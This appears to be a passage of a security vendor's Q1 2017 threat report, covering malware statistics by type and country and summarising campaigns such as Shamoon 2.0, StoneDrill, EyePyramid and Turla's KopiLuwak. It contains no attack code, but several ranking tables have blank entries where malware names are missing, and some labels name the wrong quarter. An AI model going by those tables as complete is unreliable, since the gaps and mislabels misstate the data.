It’s worth noting that Trojan-Banker.AndroidOS.Asacub is constantly expanding its spyware functionality. In addition to the standard mobile banker features, such as stealing and sending text messages, or overlaying various applications with phishing windows, this Trojan hunts for the user’s call history, contacts and GPS location.

Mobile threat statistics

In the first quarter of 2017, Kaspersky Lab detected 1,333,605 malicious installation packages, which is almost as many as in Q4 2016.

Number of detected malicious installation packages (Q2 2016 – Q1 2017)

Distribution of mobile malware by type

Distribution of new mobile malware by type (Q4 2016 and Q1 2017)

In Q1 2017, the most affected was Trojan-Ransom – its share increased from 4.64% to 16.42%, that is 3.5 times. The most rapid growth in the number of installation packages was demonstrated by the Trojan-Ransom.AndroidOS.Congur family, which will be described below.

Second came Trojan-Spyware: in terms of the growth rate, its proportion reached 10.27% (+1.83%). This was caused by the increase in the number malicious programs belonging to the Trojan-Spy.AndroidOS.SmForw and Trojan-Spy.AndroidOS.SmsThief families designed to steal SMS.

In the first quarter, the biggest decline was demonstrated by Adware (7.32%) and Trojan-Dropper (6.99%) – their shares decreased by 4.99% and 4.48% respectively. In addition, the contribution of unwanted RiskTool programs dropped by 2.55%.

TOP 20 mobile malware programs

Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

In Q1 of 2017, 14 Trojans that use advertising as their main means of monetization (highlighted in blue in the table) made it into the TOP 20.Their goal is to deliver as many adverts as possible to the user, employing various methods, including the installation of new adware. These Trojans may use superuser privileges to conceal themselves in the system application folder, from which it will be very difficult to delete them.

Name % of attacked users * 1 DangerousObject.Multi.Generic 70.09 2 9.35 3 Trojan.AndroidOS.Boogr.gsh 4.51 4 Backdoor.AndroidOS.Ztorg.c 4.18 5 Trojan.AndroidOS.Sivu.c 4.00 6 Backdoor.AndroidOS.Ztorg.a 3.98 7 Trojan.AndroidOS.Hiddad.v 3.89 8 Trojan-Dropper.AndroidOS.Hqwar.i 3.83 9 Trojan.AndroidOS.Hiddad.pac 2.98 10 Trojan.AndroidOS.Triada.pac 2.90 11 Trojan.AndroidOS.Iop.c 2.60 12 Trojan-Banker.AndroidOS.Svpeng.q 2.49 13 2.34 14 Trojan.AndroidOS.Ztorg.aa 2.03 15 Trojan.AndroidOS.Agent.eb 1.81 16 1.79 17 Trojan.AndroidOS.Loki.d 1,76 18 Trojan.AndroidOS.Ztorg.ak 1.67 19 1.59 20 1.54

* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab’s mobile security product that were attacked.

First place was occupied by DangerousObject.Multi.Generic (70.09%), the verdict used for malicious programs detected using cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object. This is basically how the very latest malware is detected. (9.35%) was second. This piece of malware imitates different popular games or programs. Interestingly, once run, it downloads and installs the application it imitated. In this case, the Trojan requests administrator rights to combat its removal. The main purpose of is aggressive display of adverts, its main “audience” is in Russia (86% of attacked users).

Third came Trojan.AndroidOS.Boogr.gsh (4.51%). Such verdict is issued for files recognized as malicious by our system based on machine learning. Despite the fact that this system can detect any types of malware, in Q1 2017, the most popular were advertising Trojans which used superuser privileges.

Eighth position in the ranking was occupied by Trojan-Dropper.AndroidOS.Hqwar.i (3.83%), the verdict used for the Trojans protected by a certain packer/obfuscator. In most cases, this name hides the representatives of the FakeToken and Svpeng mobile banking families.

The ranking also included Trojan-Banker.AndroidOS.Svpeng (2.49%), which was twelfth in the Top 20. This family has been active for three quarters in a row and remains the most popular banking Trojan in Q1 of 2017. was sixteenth in the rating (1.79%). This Trojan, targeting primarily people in India (more than 92% of attacked users), just like imitates popular programs and games, and once run, downloads and installs various applications from the fraudsters’ server.

The geography of mobile threats

The geography of attempted mobile malware infections in Q1 2017 (percentage of all users attacked)

TOP 10 countries attacked by mobile malware (ranked by percentage of users attacked)

Country* % of users attacked ** 1 Iran 47.35 2 Bangladesh 36.25 3 Indonesia 32.97 4 China 32.47 5 Nepal 29.90 6 India 29.09 7 Algeria 28.64 8 Philippines 27.98 9 Nigeria 27.81 10 Ghana 25.85

* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

In Q1 2017, Iran was the country with the highest percentage of users attacked by mobile malware – 47.35%. Bangladesh came second: 36.25% of users there encountered a mobile threat at least once during the quarter. It was followed by Indonesia and China; the share of both countries was slightly over 32%.

Russia (11.6%) came 40th in this rating, France (8.1%) 57th, the US (6.9%) 69th line, Italy (7.1%) 66th, Germany (6.2%) 72nd, Britain (5.8%) 75th.

The safest countries were Finland (2.7%), Georgia (2.5%) and Japan (1.5%).

In all the countries of the Top 20, the same mobile objects – adware – are detected, and first of all, the representatives of the AdWare.AndroidOS.Ewind family as well as advertising Trojans.

Mobile banking Trojans

Over the reporting period, we detected 32,038 installation packages for mobile banking Trojans, which is 1.1 times as many as in Q4 2016.

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions (Q2 2016 – Q1 2017)

Trojan-Banker.AndroidOS.Svpeng remained the most popular mobile banking Trojan for the third quarter in a row. This family of mobile banking Trojans uses phishing windows to steal credit card data and logins and passwords from online banking accounts. In addition, fraudsters steal money via SMS services, including mobile banking. Svpeng is followed by Trojans Trojan-Banker.AndroidOS.Faketoken.z and Trojan-Banker.AndroidOS.Asacub.san. It is worth noting that most of attacked users were in Russia.

Geography of mobile banking threats in Q1 2017 (percentage of all users attacked)

TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)

Country* % of users attacked** 1 Russia 1.64 2 Australia 1.14 3 Turkey 0.81 4 Uzbekistan 0.61 5 Tajikistan 0.48 6 Moldova 0.43 7 Ukraine 0.41 8 Kazakhstan 0.37 9 Kyrgyzstan 0.32 10 Singapore 0.26

* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

Although the Svpeng family topped the rating of the most popular mobile banking Trojans in the first quarter of 2017, its activity declined compared to the third quarter of 2016: the share of users attacked by these malicious programs in Russia dropped almost twofold – from 3.12% to 1.64%. At the same time, Russia remained the TOP 20leader.

In second place was Australia (1.14%), where the Trojan-Banker.AndroidOS.Acecard and Trojan-Banker.AndroidOS.Marcher families were the most popular threats. Turkey (0.81%) rounded off the Top 3.

Mobile Ransomware

In Q1 2017, we detected 218, 625 mobile Trojan-Ransomware installation packages which is 3.5 times more than in the previous quarter.

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab (Q2 2016 – Q1 2017)

In the first half of 2016, we saw the increase in the number of mobile ransomware installation packages caused by the active spread of the Trojan-Ransom.AndroidOS.Fusob family. In the second half of the same year, the activity of this family fell, which affected the number of detected installation packages. The growth resumed in the fourth quarter of 2016 and sharply accelerated in Q1 2017. The reason was the Trojan-Ransom.AndroidOS.Congur family – more than 86% of detected mobile ransomware installation packages belonged to this family. Usually, the representatives of Congur have very simple functionality – they change the system password (PIN), or install it if no password was installed earlier, thus making it impossible to use the device, and then ask that user to contact the fraudsters via the QQ messenger to unblock it. It is worth noting that there are modifications of this Trojan that can take advantage of existing superuser privileges to install their module into the system folder.

Despite this, Trojan-Ransom.AndroidOS.Fusob.h remained the most popular mobile Trojan-Ransomware in the first quarter, accounting for nearly 45% of users attacked by mobile ransomware. Once run, the Trojan requests administrator privileges, collects information about the device, including GPS coordinates and call history, and downloads the data to a malicious server. After that, it may receive a command to block the device.

Geography of mobile Trojan-Ransomware in Q1 2017 (percentage of all users attacked)

TOP 10 counties attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked)

Country* % of users attacked** 1 USA 1.23 2 Uzbekistan 0.65 3 Canada 0.56 4 Kazakhstan 0.54 5 Italy 0.44 6 Germany 0.37 7 Korea 0.35 8 Denmark 0.30 9 United Kingdom 0.29 10 Spain 0.28

* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab’s mobile security product in the country.

The US topped the ranking of ten countries attacked by mobile Trojan-Ransomware; the most popular family there was Trojan-Ransom.AndroidOS.Svpeng. These Trojans appeared in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng mobile banking family. They demand a ransom of $100-500 from victims to unblock their devices.

In Uzbekistan (0.65%), which came second, most of mobile ransomware attacks involved Trojan-Ransom.AndroidOS.Loluz.a. This is a simple Trojan that blocks operation of a device with its own window and asks the user to contact the fraudsters by phone to unblock it.

Fourth place was occupied by Kazakhstan (0.54%). The main threat to users originated from representatives of the Small mobile Trojan-Ransom family. This is a fairly simple ransomware program that blocks operation of a device by overlaying all the windows on the device with its own window and demanding $10 to unblock it.

In all other countries of the TOP 10, the most popular Trojan-Ransom family was Fusob.

Vulnerable apps exploited by cybercriminals

The first quarter of 2017 was marked by the return of the degenerated exploit kit Neutrino, which had departed the cybercriminal market in the third quarter. Following Magnitude, Neutrino is changing the distribution format and abandoning wide-scale campaigns to become a “private” exploit kit. Several new players – Nebula, Terror, and other –tried to fill the vacant niche but failed: after a brief burst of activity their distribution quickly came to naught. At the moment, RIG and its modifications remain the most popular and advanced public exploit kit.

The Q1 statistics show an almost 10% decline in the number of attacked users. This is primarily caused by weak exploit kit environment, as well as the decrease in the effectiveness of exploits in general. Adobe Flash remained the only platform that demonstrated growth: although no new vulnerabilities for it had been discovered, the number of attacked users grew by 20%. The biggest decrease fell on exploits for different browsers – only 44% of attacks targeted them (against 54% in the previous quarter).

CVE-2016-0189, CVE-2014-6332 and CVE-2013-2551 remain the most popular vulnerabilities in the first quarter. Of note were also vulnerabilities in the Microsoft Edge Chakra engine, published in open access in early 2017. In addition to the detailed description of vulnerabilities, the research included a ready-to-use Proof of Concept, which shortly after the publication was integrated in the Sundown exploit kit from which it moved to Neutrino, Kaixin and others. However, exploitation of these vulnerabilities was not reliable enough, while patches for them were released as far back as in November along with the MS16-129 update, so they have not become widely spread and are now almost out of use.

Distribution of exploits used in attacks by the type of application attacked, Q1 2017

In Q1 2017, especially popular were campaigns involving mass mailings of infected documents – to distribute them, Microsoft Office exploits were used. Although the share of attacked office package users has not changed much, the same users were attacked several times – on average, one attacked user received 3 malicious documents over the quarter.

The general trend is towards the increase in the share of social engineering when delivering malware to the computer of a potential victim. Campaigns involving distribution of infected messages are always based on forcing a user to perform certain actions: unpack a file from the password-protected archive, issue a permission to execute macros from the document, etc. This method is currently beginning to be applied in exploits for browsers. Magnitude, for example, offers the Internet Explorer 11 and Windows 10 users to download a malicious file under the guise of antivirus update for Microsoft Defender. Some spam campaigns are based on imitating the Google Chrome update page. We believe that this trend will continue in the future – such campaigns are easier to maintain and implement, and their level of “penetration” is constantly growing.

Online threats (Web-based attacks) Online threats in the banking sector

These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. Beginning from the first quarter of 2017 the statistics include malicious programs for ATMs and POS terminals but does not include mobile threats.

Kaspersky Lab solutions blocked attempts to launch one or several malicious programs capable of stealing money via online banking on 288,000 computers in Q1 2017.

Number of users attacked by financial malware, January – March 2017

Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM and POS-malware worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.

Geography of banking malware attacks in Q1 2017 (percentage of attacked users)

TOP 10 countries by percentage of attacked users

Country* % of attacked users ** 1 Germany 1.70 2 China 1.37 3 Libya 1.12 4 Kazakhstan 1.02 5 Palestine 0.92 6 Togo 0.91 7 Tunisia 0.89 8 Armenia 0.89 9 Venezuela 0.88 10 Taiwan 0.87

These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

*We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000).

** Unique users whose computers have been targeted by banking Trojan attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In the first quarter of 2017, Germany (1.70%) had the highest proportion of users attacked by banking Trojans. It was followed by China (1.37%). Libya (1.12%) rounded off the Top 3.

As for the contribution of the other European countries in the Q1 rating, for example, Spain (0.24%) was on 89th position and the UK (0.15%) came 126th.

The TOP 10 banking malware families

The table below shows the TOP 10 malware families used in Q3 2016 to attack online banking users (as a percentage of users attacked):

Name* % of attacked users** 1 Trojan-Spy.Win32.Zbot 45.93 2 Trojan.Win32.Nymaim 29.70 3 Trojan.Win32.Neurevt 3.31 4 Trojan-Banker.Win32.Gozi 3.15 5 Trojan-Spy.Win32.SpyEyes 2.71 6 Backdoor.Win32.ZAccess 2.11 7 Backdoor.Win32.Shiz 1.67 8 Trojan.Multi.Capper 1.67 9 Trojan.Win32.Tinba 1.00 10 Trojan.Win32.Shifu 1.00

*The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.

** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware.

As in the last year, in Q1 2017, Trojan-Spy.Win32.Zbot (45.93%) topped the rating of the most popular malware families. Its source codes have been publicly available since a leak and are now widely exploited as an easy-to-use tool for stealing user payment data. Unsurprisingly, this malware consistently tops this rating – cybercriminals regularly enhance the family with new modifications compiled on the basis of the source code and containing minor differences from the original.

Second came Trojan.Win32.Nymaim (29.70%). The first modifications of malware belonging to this Trojan family were downloaders, which blocked the infected machine with the help of downloaded programs unique for each country. Later, new modifications of the Trojan.Win32.Nymaim family malware were discovered. They included a fragment of Gozi used by cybercriminals to steal user payment data in online banking systems. In Q1 2017, Gozi (3.15%) was on 4th position in the rating.

Trojan.Win32.Neurevt (3.31%) rounded off the Top 3. It is a multifunctional Trojan written in C ++. It uses rootkit technologies to conceal its presence in the system, injects its own code into all running processes, blocks the work of some anti-virus programs, and can monitor and block installation of other common Trojans.

Ransomware Trojans

A total of 11 new cryptor families and 55, 679 new modifications were detected in Q1 2017.

The number of newly created cryptor modifications, Q2 2016 – Q1 2017

Most of detected modifications belonged to the Cerber family (the Trojan-Ransom.Win32.Zerber verdict). This cryptor, first discovered a year ago, continues to evolve, and we regularly detect its new improved versions.

The number of users attacked by ransomware

In Q1 2017, 240, 799 unique KSN users were attacked by cryptors.

Number of unique users attacked by Trojan-Ransom cryptor malware (Q1 2017)

This figure is almost half as much as that of the fourth quarter of 2016, but one should not consider it a receding threat. It is most likely that this difference is related to the methodology while the actual number of incidents is higher: the statistics only reflect the results of signature-based and heuristic detection, whereas most of the Trojan ransomware is detected by Kaspersky Lab products using behavioral methods and issuing a generic verdict that does not allow distinguishing types of malware.

The geography of attacks

Geography of Trojan-Ransom attacks in Q1 2017 (percentage of attacked users)

Top 10 countries attacked by cryptors Country* % of users attacked by cryptors ** 1 Italy 1.87% 2 Brazil 1.07% 3 Japan 0.99% 4 Vietnam 0.74% 5 Netherlands 0.73% 6 Cambodia 0.70% 7 Uganda 0.66% 8 Philippines 0.65% 9 Venezuela 0.63% 10 Nigeria 0.60%

* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 50,000).
** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country.

Italy, which was not in the Top 10 in the third quarter of 2016, now took the lead the Q1 ranking (1.87%). Second came Brazil (1.07%), the newcomer to the Top 10. This correlates with our observations that indicate an increase in the number Trojan ransomware targeting victims in Brazil. One of the examples of such malicious software was Xpan, which we analyzed last year.

Japan (0.99%), which ranked first in the second and third quarters of 2016, moved two places down but still remains at the top of the rating.

Top 10 most widespread cryptor families Name Verdict* % of attacked users** 1 Cerber Trojan-Ransom.Win32. Zerber 18.04% 2 Spora Trojan-Ransom.Win32.Spora 7.59% 3 Locky Trojan-Ransom.Win32.Locky 7.35% 4 Sage Trojan-Ransom.Win32.SageCrypt 3.44% 5 Cryrar/ACCDFISA Trojan-Ransom.Win32.Cryrar 3.20% 6 Shade Trojan-Ransom.Win32.Shade 2.82% 7 (generic verdict) Trojan-Ransom.Win32.Gen 2.37% 8 Crysis/Dharma Trojan-Ransom.Win32.Crusis 2.30% 9 CryptoWall Trojan-Ransom.Win32.Cryptodef 2.25% 10 (generic verdict) Trojan-Ransom.Win32.Snocry 2.16%

* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.

The Trojan Cerber (18.04%) was the most widespread in the number of attacked users in the first quarter of 2017. It is no wonder, considering a huge number of this cryptor’s modifications and its active distribution by fraudsters.

Spora (7.59%) was on the second place. This new Trojan was first discovered in January 2017 and at the “dawn of its career” only attacked Russian-speaking victims. However, a few weeks after its detection Spora spread around the world and by the end of the first quarter entered the top three most popular cryptors. The third position was occupied by Locky (7.35%) which appeared about a year and has recently reduced its activity a little.

Yet another new Trojan is Sage (3.44%). Like Spora, it emerged in the first quarter of 2017 and came fourth in the Q1 rating. The rest places went to our “old acquaintances”, which appeared in the reports for the previous quarters.

Of special note is the finding of the quarter the cryptor PetrWrap, which is used by cybercriminals for targeted attacks on organizations. Statistics show that this type of attacks is gaining popularity.

Top 10 countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2017, Kaspersky Lab solutions blocked 479, 528, 279 attacks launched from web resources located in 191 countries around the world. 79, 209, 775 unique URLs were recognized as malicious by web antivirus components.

Distribution of web attack sources by country, Q1 2017

The Netherlands (38%) took the lead in the number of web attack sources. The United States (30%), which used to top this rating for several quarters in a row, dropped to second place, although the share of this country remained almost unchanged from the 2016’s figures. Germany (9%) rounded off the Top3.

Russia (4%) and France (3%) were fourth and fifth respectively.

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked** 1 Algeria 37.67 2 Belarus 33.61 3 Tunisia 32.04 4 Ukraine 31.98 5 Kazakhstan 29.96 6 Azerbaijan 29.95 7 Albania 29.80 8 Bangladesh 29.51 9 Qatar 29,41 10 Armenia 29.02 11 Greece 28.21 12 Moldova 27.46 13 Venezuela 27.37 14 Kyrgyzstan 27.02 15 Vietnam 26.87 16 Russia 26.67 17 Morocco 25.65 18 Sri Lanka 25.42 19 Brazil 25.10 20 Serbia 24.18

These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** Unique users whose computers have been targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 20.05% of computers connected to the Internet globally were subjected to at least one Malware-class web attack during the quarter.

Geography of malicious web attacks in Q1 2017 (ranked by percentage of users attacked)

The countries with the safest online surfing environments included Luxembourg (14.4%), Germany (13.9%), Norway (13.83%), South Africa (12.5%), the United States (10.56%), Uganda (10.29%) and Japan 9.18%).

Local threats

Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q1 2017, Kaspersky Lab’s file antivirus detected 174, 989, 956 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

The rating of malicious programs only includes Malware-class attacks. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked** 1 Yemen 54.84 2 Afghanistan 54.27 3 Uzbekistan 53.80 4 Tajikistan 51.32 5 Ethiopia 50.87 6 Djibouti 50.03 7 Algeria 49.38 8 Vietnam 49.15 9 Turkmenistan 48.39 10 Rwanda 47.57 11 Mongolia 47.25 12 Somalia 46.96 13 Syria 46.96 14 Bangladesh 46.64 15 Iraq 46.59 16 Sudan 46.35 17 Nepal 46.19 18 Kazakhstan 46.00 19 Laos 45.39 20 Belarus 43.45

These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** The percentage of unique users in the country with computers that blocked Malware-class local threats as a percentage of all unique users of Kaspersky Lab products.

An average of 23.63% of computers globally faced at least one Malware-class local threat during the third quarter. Russia’s contribution to this rating accounted for 30.51%.

The safest countries in terms of local infection risks were: Poland (14.85%), Singapore (12.21%), Italy (13.30%), France (11.15%), Australia (10.51%), Great Britain (9.08%), Canada (8.66%), the Czech Republic (7.83%), the United States (7.57%), Denmark (6.35%), Japan (6.18%).

IT threat evolution Q1 2017

Fri, 05/19/2017 - 09:26

Overview Targeted attacks and malware campaigns More wipers

The aim of most targeted attack campaigns is to steal sensitive data. However, this isn’t always the goal. Sometimes attackers erase data instead of – or as well as – trying to gain access to confidential information. We’ve seen several wiper attacks in recent years. They include Shamoon (also known as ‘Disttrack’), believed to have been used to erase data on more than 30,000 computers at Saudi Aramco in 2012, and Dark Seoul, used in the attack on Sony Pictures in 2013.

Shamoon re-appeared in November 2016, targeting organisations in various critical and economic sectors in Saudi Arabia. So far we have observed three waves of attacks using the Shamoon 2.0 malware – activated on 17 November 2016, 29 November 2016 and 23 January 2017.

While the attacks share many similarities with the earlier wave of attacks, they now feature new tools and techniques. The attackers start by obtaining administrator credentials for the target network. Then they build a custom wiper (Shamoon 2.0) which uses the stolen credentials for lateral movement across the organisation. Finally, the wiper activates on a predefined date, leaving the infected computers unusable. The final stage of the attack is completely automated and doesn’t rely on communication with the attacker’s C2 (Command-and-Control) center.

Shamoon 2.0 also includes a ransomware component. This has yet to be used in the wild, so it’s unknown whether the attackers would use this part of the platform for financial gain or for idealistic purposes.

While investigating the Shamoon attacks, we discovered a previously unknown wiper. This malware, which we’ve named StoneDrill, also seems to target organisations in Saudi Arabia. There are similarities in style to Shamoon, with additional features designed to help it evade detection. One of the victims of StoneDrill, observed via the Kaspersky Security Network (KSN) is located in Europe (and operates in the petro-chemicals sector), suggesting that the attackers might be expanding their wiping operations beyond the Middle East.

The most significant difference between the two relates to the wiping process. Shamoon uses a disk driver for direct access to the disk, whereas StoneDrill injects the wiper directly into the victim’s preferred browser.

StoneDrill also shares similarities with an APT group known as NewsBeef (also known as ‘Charming Kitten’), so-called because of its use of the Browser Exploitation Framework (BEeF). These similarities include familiar WinMain and OS signatures, update commands and C2 server names. It isn’t known whether the groups behind Shamoon and StoneDrill are the same, or are just aligned in terms of interests and the regions they target – the latter seems most likely to us.

In addition to the wiping module, StoneDrill also includes a backdoor that has been used to run espionage operations against a number of targets.

You can find the full report on Shamoon 2.0 and StoneDrill here. By subscribing to our APT intelligence reports, you can get access to our investigations and discoveries as they happen, including comprehensive technical data.


As we’ve seen before, targeted attacks don’t have to be technically advanced in order to be successful. In January 2016, the arrest of two suspects by Italian police brought to light a series of cyber-attacks that targeted prominent politicians, bankers, freemasons and members of law enforcement agencies.

The malware used in the attacks, called ‘EyePyramid’, was unsophisticated, but nevertheless successful enough to enable the attackers to gain access to all resources on their victims’ computers. The police investigation revealed 100 active victims in the server used to host the malware, but there were indications that the attackers had targeted around 1,600 victims in the last few years. Their victims – located mostly in Italy – included law firms, consultancy services, universities and Vatican cardinals.

The Italian police report didn’t include technical details about how the malware was spread – other than revealing that spear-phishing was used. However, it did identify a number of C2 servers and e-mail addresses used by the attackers to exfiltrate stolen data. Using this information, we created a YARA rule, based on custom e-mail addresses, C2 servers, licences for the custom mailing library used by the attackers and specific IP addresses used in the attack. Then we ran it through our systems to see if it matched any known samples. Out initial YARA rule highlighted two samples which enabled us to create a more specific YARA rule that identified a further 42 samples in our collection. A further search revealed more details about EyePyramid. The attacks relied on social engineering to trick victims into opening and running infected files attached to the spear-phishing e-mails. The attachments used were ZIP and 7ZIP archives which contained the malware. The attackers used multiple spaces to try and mask the extension of the file – underlining the low level of sophistication of the attacks.

Based on the compilation time-stamps of the samples, which appear to be legitimate, most samples used in the attacks were compiled in 2014-15.

It’s clear that cybercriminals can achieve success even when the malware they use is neither sophisticated nor hard to detect. From the poor OPSEC (operational security) employed in the campaign (for example, using IP addresses associated with their own company and discussing victims in regular phone calls and using WhatsApp), it’s clear that the attackers were amateurs. Nevertheless, they were able to operate for many years and managed to steal gigabytes of data from their victims.

You can read our full report on EyePyramid here.

Breaking the weakest link of the strongest chain

In the middle of 2016 more than 100 Israeli servicemen were targeted by a cunning threat actor. The attack compromised their devices and exfiltrated data to the attackers’ C2 server.

The IDF (Israeli Defense Forces) C4I and the IDF Information Security Department unit, with Kaspersky Lab researchers, obtained a list of the victims – all IDF servicemen serving around the Gaza strip.

This campaign, which experts believe is still in its early stages, targets Android OS devices. Once the device has been compromised, a process of sophisticated intelligence gathering begins, exploiting the phone’s video and audio capabilities, SMS functions and location.

The attacks are unsophisticated, relying heavily on social engineering techniques. The attackers lure their victims into installing a malicious application, while continuously attempting to acquire confidential information using social networks: the group seems particularly active on Facebook Messenger. Most of the avatars used by the attackers (virtual participants in the social engineering stage of the attack) lure the victims using sexual themes: for example, asking the victim to send explicit photographs and, in return, sending fake photos of teenage girls. The avatars pretend to be from different countries such as Canada, Germany, Switzerland and others.

The victim is tricked into downloading an app from a malicious URL. The app collects data from the victim’s phone, including general information (network operator, GPS location, IMEI, etc.), contacts, browsing history, SMS messages, pictures. The app is also able to record video and audio.

The IDF, which led the research along with Kaspersky lab researchers, believes that this is just the opening shot of a wider campaign that is designed to capture data on how ground forces are distributed, the tactics and equipment the IDF uses and real-time intelligence.

You can read our full report on this campaign here.

The non-persistence of memory

During an incident response, security specialists hunt for any artefacts that attackers have left behind in the victim’s network. This includes inspecting log files, looking for files on the hard drive, looking at the registry and checking memory.

However, each of these has a different ‘shelf-life’: in other words, the clues will be available to an analyst for a shorter or longer time, depending on where they’re located. Data stored on a hard drive will probably be available to a forensic analyst for a long time: although, as we saw with Duqu 2.0, sophisticated malware might deliberately remove all traces from the hard drive after installation, leaving itself in memory only. This is why memory forensics is critical to the analysis of malware and its functions.

Another important aspect of an attack is the tunnels that are installed in the network by an attacker. Cybercriminals (such as Carbanak and GCMAN) might use PLINK for this purpose; Duqu 2.0 used a special driver.

In our predictions for 2017 we forecast an increase in ephemeral infections – memory-resident malware intended for general reconnaissance, with no interest in persistence. In highly sensitive environments, where stealth is essential, attackers might well be satisfied to operate until the malware is cleared from memory during a re-boot, since this will reduce the likelihood of the malware being detected and their operation being compromised.

During a recent incident response our experts found that both memory-based malware and tunnelling had been implemented in a bank attack using standard Windows utilities such as SC and NETSH. The threat was originally discovered by the bank’s security team after they detected Meterpreter code inside the physical memory of a domain controller. We participated in the forensic analysis following this detection and discovered the use of PowerShell scripts within the Windows registry. We also discovered that the NETSH utility was used for tunnelling traffic from the victim’s host to the attacker´s C2.

You can read the details of our investigation here.

Using the Kaspersky Security Network we found more than 100 enterprise networks infected with malicious PowerShell scripts in the registry.

We don’t know if they were all infected by the same attacker. During our analysis of the affected bank we learned that the attackers had used several third level domains and domains in the .GA, .ML and .CF ccTLDs. The benefit, for the attackers, of using such domains is that they are free and don’t include WHOIS information after the domain expiration. The fact that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information makes attribution almost impossible. The closest groups with the same TTPs are Carbanak and GCMAN.

Techniques like this are becoming more common, especially in attacks against financial institutions. Exfiltration of data can be achieved using standard utilities and some tricks, without the need for malware. Such ephemeral attacks highlight the need for sophisticated, proactive technology in anti-malware solutions, such as Kaspersky Lab’s System Watcher.

KopiLuwak: a new JavaScript payload from Turla

The Russian-speaking APT group Turla (known variously as ‘Snake’, ‘Uroburos’, ‘Venomous Bear’ and ‘KRYPTON’) has been active since at least 2007 (and maybe even longer). Its activities have been traced to many high-profile incidents, including the 2008 attack against the US Central Command (the Buckshot Yankee incident) and, more recently, the attack against the Swiss military contractor, RUAG. We’ve discuss its activities on a number of occasions (here, here, here and here). The group intensified its activities in 2014, targeting Ukraine, EU-related institutions, governments of EU countries, global foreign affairs ministries, media companies and possibly corruption-related targets in Russia. In 2015 and 2016 the group diversified its activities, switching from the Epic Turla watering-hole framework to the Gloog Turla framework, which is still active. The group also expanded its spear-phishing activities with the Skipper/WhiteAtlas attacks, which made use of new malware. Recently, the group has intensified its satellite-based C2 registrations ten-fold compared to the 2015 average.

In January, John Lambert from Microsoft (@JohnLaTwC) tweeted about a malicious document that dropped a ‘very interesting .JS backdoor‘. Since the end of November 2016, Kaspersky Lab has observed Turla using this new JavaScript payload and specific macro variant. This is a technique we’ve observed before with Turla’s ‘ICEDCOFFEE’ payloads (detailed in a private report from June 2016 which is available to customers of Kaspersky APT Intelligence Services). While the delivery method is somewhat similar to ICEDCOFFEE, the JavaScript differs greatly and appears to have been created mainly to avoid detection.

The targeting of this new malware is consistent with previous campaigns conducted by Turla, focusing on foreign ministries and other governmental organizations throughout Europe. However, the frequency is much lower than ICEDCOFFEE, with victim organizations numbering in the single digits (as of January 2017). We strongly believe that this new JavaScript will be used more heavily in the future as a first-stage delivery mechanism and victim profiler.

